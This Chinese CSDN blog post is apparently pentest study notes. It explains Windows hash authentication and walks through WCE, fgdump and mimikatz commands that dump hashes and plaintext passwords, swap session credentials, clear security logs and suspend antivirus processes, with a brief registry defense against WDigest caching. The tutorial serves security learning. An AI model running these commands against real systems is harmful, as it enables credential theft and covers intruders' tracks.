1. Windows身份認證的過程
在登入目标系統時,會将輸入的密碼進行lmhash和nthash加密;
然後将加密後的密碼與SAM賬戶資料庫進行比對,如果比對比對,則成功登入作業系統;
如果是遠端的主機嘗試進行登入目标系統,也是通過遠端主機自身将輸入的密碼進行lmhash和nthash計算,将加密後的密文通過網絡進行傳輸到目标主機;
是以,不論是本地還是遠端登入作業系統,密碼都是以密文的形式進行傳輸,相對安全,當然也可以用hash碰撞的方式進行爆破;
注:在登陸的目标服務系統後,有一個wdigest安全包,直接從記憶體總讀取賬戶資訊,會在本地緩存一個明文密碼,當登出登陸後,該賬戶資訊會被删除;

2. WCE(Windows credential editor)——Windows身份驗證資訊編輯器
WCE是一款功能強大的windows平台内網滲透的工具,使用WCE必須要有管理者的權限;
它內建在kali的工具包的windows程式中,可以共享給win_XP;
它可以列舉登陸會話,并且可以添加、改變和删除相關憑據。在内網滲透中非常強大;主要功能參數如下:
檢視目前系統中的賬戶資訊;
(1) wce-universal.exe -l
# 檢視目前登入的賬戶和加密的密碼,其中,計算機名也會被當做使用者來處理;
(2)wce-universal.exe -lv
# 檢視登入狀态使用者的詳細資訊,包括LUID,賬戶和加密後的密碼等;
# 檢視資訊時,首先嘗試安全模式,直接從記憶體中讀取資訊,讀取失敗後,會嘗試注入模式(可能對系統造成損害)
(3) wce-universal.exe -d LUID
wce-universal.exe -d 00408339,# 删除一個指定會話的LUID,删除y使用者的LUID,可以看到y使用者的目前會話沒有了;
(4) wce-universal.exe -r
# 顯示目前最新登入資訊,5秒重新整理一次;在此過程中,嘗試登入z賬戶,可以看到已經重新整理出z賬戶的會話資訊;
(5) wce-universal.exe -g 123456
# 對指定的内容進行hash計算;
(6) wce-universal.exe -w
# 以明文形式讀取密碼,最常用和實際的作用;
(7) 修改使用者的登入會話,将z使用者的登入會話修改成另外的一個使用者yaoxingzhi;
wce-universal.exe -i 00523687 -s yaoxingzhi:UPWARD:
AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
(8)防禦WCE攻擊
系統通過Digest Authentication Package維護明文密碼,預設自啟動,可在系統資料庫(regedit)中關閉預設啟動。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Package
可以看到在系統資料庫中關閉維護明文密碼之後,再次運作wce-universal.exe -w,不能擷取任何的資訊,并且系統會自動重新開機;
3. Fgdump工具
Fgdump是內建在Kali上的Windows工具;可以下載下傳到win_XP上使用;
輕按兩下fgdump,可以得到如下三個檔案,其中一個包括賬戶和加密的密碼檔案;
擷取到加密的密碼後,可以通過Kali內建的工具進行hash碰撞;
4. mimikatz工具
Mimikatz(usr/share/mimikatz)是在Kali上內建的Windows工具;
Mimikatz工具是由俄羅斯人寫的,用法跟其他的工具不太一樣;
常見的功能如下所示:
(1) :: #檢視幫助資訊;
(2)privilege::debug #提升權限;
(3)sekurlsa::logonPasswords #檢視登入狀态的賬戶和密碼;
登入切換另外的賬戶;可以檢視所有登入賬戶的使用者名和密碼;
(4)process子產品
4.1> 檢視可以執行的子子產品;
4.2> 檢視程序清單;
4.3> 開啟一個程序;
4.4> suspend #挂起程序:可用于植入木馬時,暫停防病毒軟體等;
(5)lsadump子產品 # lsadump::sam從SAM資料庫中讀取賬号密碼,在XP中不成功,但在WIN7、win8中可能成功;
(6)event子產品
6.1> event::clear # 清除作業系統的安全日志
6.2> event::drop #不再進行新的日志
(7) misc子產品
misc::cmd #打開cmd指令行視窗;
(8)token子產品
token::whoami
————————————————
版權聲明:本文為CSDN部落客「橘子女俠」的原創文章,遵循CC 4.0 BY-SA版權協定,轉載請附上原文出處連結及本聲明。
原文連結:https://blog.csdn.net/qq_38684504/article/details/89481147